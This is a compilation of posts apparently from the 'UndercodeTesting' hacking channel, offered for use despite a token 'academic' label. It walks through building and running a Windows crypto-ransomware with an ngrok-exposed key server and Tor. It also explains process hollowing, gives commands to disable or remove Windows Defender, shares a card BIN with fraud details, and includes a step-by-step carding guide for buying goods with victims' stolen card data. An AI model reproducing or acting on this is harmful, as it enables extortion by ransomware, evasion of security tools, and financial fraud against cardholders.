# SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑GOOD RANSOMWARE FOR WINDOWS
> A POC Windows crypto-ransomware (Academic)
t.me/UndercodeTesting

🦑 WHAT IS RANSOMWARE ?

Ransomware is a type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files unless a ransom is paid. More modern ransomware families, collectively categorized as crypto-ransomware, encrypt certain file types on infected systems and forces users to pay the ransom
through certain online payment methods to get a decrypt key.

🦑 FEATURES :

Run in Background (or not)
Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.
RSA-4096 to secure the client/server communication.
Includes an Unlocker.
Optional TOR Proxy support.
Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.
Walk all drives by default.
Docker image for compilation.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :


First of all download the project outside your $GOPATH:

git clone github.com/mauri870/ransomware
cd ransomware
If you have Docker skip to the next section.

You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:

export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:

make deps
make
You can build the server for windows with make -e GOOS=windows.

Docker
./build-docker.sh make
Config Parameters
You can change some of the configs during compilation. Instead of run only make, you can use the following variables:

HIDDEN='-H windowsgui' # optional. If present the malware will run in background

USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server

SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware

SERVER_PORT=8080 # the server port, if using a domain you can set this to 80

GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
@uNDERCODETesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TUTORIAL HOW TO RUN RANSOWAMRE ON WINDOWS ?

1) First of all lets start our external domain:

ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.

2) Let's compile the binaries (remember to replace the domain):

make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.

3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.

4) Enter the server directory from another terminal and start it:

cd bin/server && ./server --port 8080
To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:

curl http://2af7161c.ngrok.io

5) If you see a OK and some logs in the server output you are ready to go.

Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.

6) Then simply run the ransomware.exe and see the magic happens 😄.

The window that you see can be hidden using the HIDDEN option described in the compilation section.

7) After download, extract and start the Tor proxy, the malware waits until the tor bootstrapping is done and then proceed with the key exchange with the server. The client/server handshake takes place and the client payload, encrypted with an RSA-4096 public key must be correctly decrypted on the server. The victim identification and encryption keys are stored in a Golang embedded database called BoltDB (it also persists on disk). When completed we get into the find, match and encrypt phase, up to N-cores workers start to encrypt files matched by the patterns defined. This proccess is really quick and in seconds all of your files will be gone.

7) The encryption key exchanged with the server was used to encrypt all of your files. Each file has a random primitive called IV, generated individually and saved as the first 16 bytes of the encrypted content. The algorithm used is AES-256-CTR, a good AES cypher with streaming mode of operation such that the file size is left intact.

8) The only two sources of information available about what just happen are the READ_TO_DECRYPT.html and FILES_ENCRYPTED.html in the Desktop.

9) In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID(located on the file created on desktop). If the attacker can confirm your payment it will possibly(or maybe not) return your encryption key and the unlocker.exe and you can use then to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.

10) Let's suppose you get your encryption key back. To recover the correct key point to the following url:

curl -k http://2af7161c.ngrok.io/api/keys/:id


11) Where :id is your identification stored in the file on desktop. After, run the unlocker.exe by double click and follow the instructions.

That's it, got your files back :)

The server has only two endpoints:

POST api/keys/add - Used by the malware to persist new keys. Some verifications are made, like the verification of the RSA autenticity. Returns 204 (empty content) in case of success or a json error.

GET api/keys/:id - Id is a 32 characters parameter, representing an Id already persisted. Returns a json containing the encryption key or a json error

@uNDERCODETesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Process hollowing: Hiding code in legitimate processes

> Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process and then “hollowing it out”, i.e., replacing the legitimate code with malware.

> Unlike most injection techniques that add a malicious feature to an otherwise normally running process, the result of hollowing is a process that looks legitimate on the outside but is primarily malicious on the inside.
t.me/UndercodeTesting

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :

While there are few known techniques that achieve process hollowing, the most common variant typically follows four steps to achieve stealthy execution of malicious code:

1) The malware spawns a new instance of a legitimate process (e.g., explorer.exe, lsass.exe, etc.), and places it in a suspended state.
The malware then hollows out the memory section in the new (and still suspended) process that holds the base address of the legitimate code.

2) To do this, the malware uses the NtUnmapViewOfSection routine.
It allocates read-write-execute (RWX) memory in the suspended process to prepare for the replacement malicious code.

3) The malware then copies malicious code into the allocated memory. It changes the target address of the first thread to the malicious program’s entry point.

4) When the thread resumes, the malicious code starts running, now disguised as a legitimate process. The malware is then free to delete remnants of itself from disk to avoid detection.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 DISABLE WINDOWS DEFENDER USING CMD :
instagram.com/UndercodeTesting

> Using Command Prompt
1) Open command prompt with administrative privileges

2) Run the following command to disable Windows Defender:
sc stop WinDefend

3) To enable Windows defender again, run the following command:
sc start WinDefend

4) Please note that this is a temporary method to stop Windows Defender. The service will return to its original state when the system is restarted. To disable Windows Defender permanently using command prompt, run the following command:

> sc config WinDefend start= disabled

> sc stop WinDefend

5) To enable it again on startup, run the following commands:

sc config WinDefend start= auto
sc start WinDefend

6) If you want to check the current state of Windows Defender service, run the following command:

> sc query WinDefend

Check the STATE variable. It should be in RUNNING state if it is enabled.


🦑 Using PowerShell
One advantage of PowerShell is that you can deploy changes to Windows Defender on multiple computers over the network.

If you prefer PowerShell way, follow the steps below:

1) Run PowerShell with administrative privileges (Windows key + X + A)
To disable real-time monitoring of Windows Defender, run the following command:

2) Set-MpPreference -DisableRealtimeMonitoring $true

3) To enable real-time monitoring, run the following command:

4) Set-MpPreference -DisableRealtimeMonitoring $false

5) The above method will only turn off real-time monitoring of Windows Defender. If you want to completely remove Windows Defender from Windows 10, use the following PowerShell command:

> Uninstall-WindowsFeature -Name Windows-Defender

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 BIN Youtube Premium verified

51111421103xxxxx0

Fecha : 05/25
CVV : RND
IP : India

Address : Street 1
City : Mumbai
Zip Code : 40001
State : Maharashtra

> how use bin : https://t.me/UnderCodeTesting/3768

> cc generators 2020 : https://t.me/UnderCodeTesting/3411

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 popular ONLINE ANTI-MALWARES SCANNERS :

> https://us.norton.com/support/tools/npe.html

> https://www.virustotal.com/gui/home/upload

> https://www.bitdefender.com/solutions/virus-scanner-for-mac.html

> https://scanmyserver.com/registration.html

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 47,000 developers generate 30,000 vulnerabilities every month, how Microsoft used AI to troubleshoot ? recently from undercodeNews tweets
t.me/UndercodeTesting

> The machine learning model built by Microsoft aims to help developers accurately identify and prioritize key security issues that need to be fixed and prioritize them.

> Christiansen said: "Our goal is to build a machine learning system to divide the BUG into safe / non-safe and critical / non-critical as close as possible to the accuracy of security experts."

> In order to achieve this goal, Microsoft has conducted a lot of training on the learning model, providing many BUGs marked as safe and other BUGs marked as unsafe.

> After the model is trained, it is possible to label data that has not been pre-categorized based on the grasped information.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CARDING FOR BEGINERS :
part 1
t.me/UndercodeTesting

> Basically enter the "online store" details, they have two types:

# 1 VBV:
VBV is a credit card online transaction security system verified by Visa. This means that you need to provide a card that knows the credit card information of many victims, such as DOB (date of birth), SSN (social security number), the security password witch CC owner for online purchase. You can check whether there is VBV verified by VISA ICON on the homepage in the store.

# 2 NON VBV:
NON VBV has not been verified by the visa card, you can use the non-VBV card to buy anything without going through the verification procedure. We now leave it for later use.

Follow the baby steps below:

Step # 1 Connect to your VPN connection software and select the default country

Step # 2 To connect to the RPD (remote Destkop connection), it must be in the same country (IP) and the status is the same as the cardholder address.

Step # 3 Now, from RPD, connect to socks5 through Mozzila Firefox, such as 97.77.96.226 34539, which must be the same as written on the card number of the holder: COUNTRY, STATE, CITY, etc.

Step 4 After completing all operations, please create an email with the same name, address, city and all contents of the credit card holder. Or, if you have email access, that's even better.

Step 5 Go to the website store where you want to swipe. (Don't be lazy, find a nice private store in any other product sold in your country or worldwide).

Step # 6 Register the information, name, country / region, city, address and email with the credit card holder, which you created for this order.

Step # 7 Add a shipping address. Some websites do not allow shipping to other addresses, but there are many other shops in Witch. The shipping address is the shipping address of the product packaging. This means you can provide your address, address of friends, colleagues, etc.

Step # 8 Select the desired product and click "Checkout", now it will ask you how to pay. Select a credit card, then type the victim's credit card number and other required information.

Step # 9 Now click on "Order" and I'm sure they will confirm your order via email, or track your order on the website after you press the order.

Note: Some websites require phone verification, but you can buy a phone number at any time, confirm the order and destroy it after shipping the goods.

Step # 10 Wait for the order to arrive at your delivery address. I personally use FEDEX, EURO EXPRESS, and CITY EXPRESS. They called me when they arrived, I used to give them different addresses, and I wanted to take my order from there. Calm down now, as if you stole $ 100 million and took the package. Own items or sell items, then repeat until you die! ! !

🦑use Carding for learn not steal

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁